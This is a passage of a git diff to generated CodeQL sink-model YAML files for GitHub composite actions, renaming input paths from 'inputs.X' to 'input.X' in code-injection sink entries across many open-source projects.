"generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 981fe0fd348..f51d784d7c1 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] - - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 6c984a676d0..ac6af801a0e 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index 1138d37fb5f..fb676663019 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] - - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file + - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 1418299b39a..503386ea3d4 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] - - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file + - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index fb67f66ce62..6d48d32e9fa 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] - - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "input.some", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 12aa48431db..ae6d1fcc1e8 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] - - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 336af4b814b..48b98225721 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 8d2170c47e2..14bfe57eb11 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 854601e3dde..4b04351ab90 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file + - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 8a6074b8796..755147a6f1a 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] - - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file + - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 48203004ed5..12017671b4e 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] + - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 042ca09efa6..e3028cc1bb3 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 51d4903fbb1..ab112bb5ec0 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file + - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 12dc3005260..0d8ae4e102e 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file + - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index dfe3b7f4332..44156ddd670 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file + - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.src_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 663fada6df9..693d456e4a5 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 4a53345e6e5..5e3dffbb7f5 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 0a18189242d..5d782529f7f 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file + - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 93ec3ea468d..f7f845ac28f 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file + - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 27f5af98f89..a58f033cc38 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 125dd8324d2..aefece4bebd 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index dfa24454444..5cbcfc01879 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 9469e745ffc..0712838a737 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file + - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.password", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 6e34a2cf592..5ab14ba453b 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 4ea72b28476..564961fc600 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index a0b7bca54ad..8876184a0c1 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git 